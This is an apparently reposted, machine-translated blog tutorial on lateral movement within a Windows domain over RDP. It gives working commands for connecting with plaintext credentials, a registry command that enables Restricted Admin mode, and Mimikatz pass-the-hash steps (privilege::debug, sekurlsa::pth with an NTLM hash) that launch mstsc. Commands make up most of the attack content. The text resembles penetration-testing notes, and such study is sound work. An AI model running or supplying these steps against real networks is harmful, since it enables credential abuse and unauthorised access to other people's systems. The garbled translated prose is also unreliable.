current position:Home>Domain lateral move RDP delivery

Domain lateral move RDP delivery

2022-05-15 07:42:15Low risk performing artist

The domain moves horizontally RDP Pass on -Mimikatz
In addition to the above IPC,WMI,SMB In addition to the connection of other protocols , Get the plaintext password or HASH Ciphertext can also be passed through RDP Protocol for connection operation .
notes :RDP Equivalent to linux Inside ssh, Remote connection protocol ,linux Of ssh It's the equivalent of windows Of rdp agreement , That's what they say 3389 port .

RDP Plaintext password connection
mstsc.exe /console /v:192.168.3.21 /admin
rdesktop 192.168.3.21:3389
RDP Ciphertext HASH Connect
windows Server Need to open Restricted Admin mode, stay windows 8.1 and windows Server 2012R2 On by default , At the same time, if Win 7 and Windows Server 2008 R2 Installed 2871997/2973351 Patches also support ; Open command :
REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f
Start and run :
mstsc.exe /restrictedadmin

mimikatz.exe
privilege::debug
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208sdlfkjssdlfksj “/run:mstsc.exe/restrictedadmin”

copyright notice
author[Low risk performing artist],Please bring the original link to reprint, thank you.
https://en.chowdera.com/2022/131/202205102126591958.html

Random recommended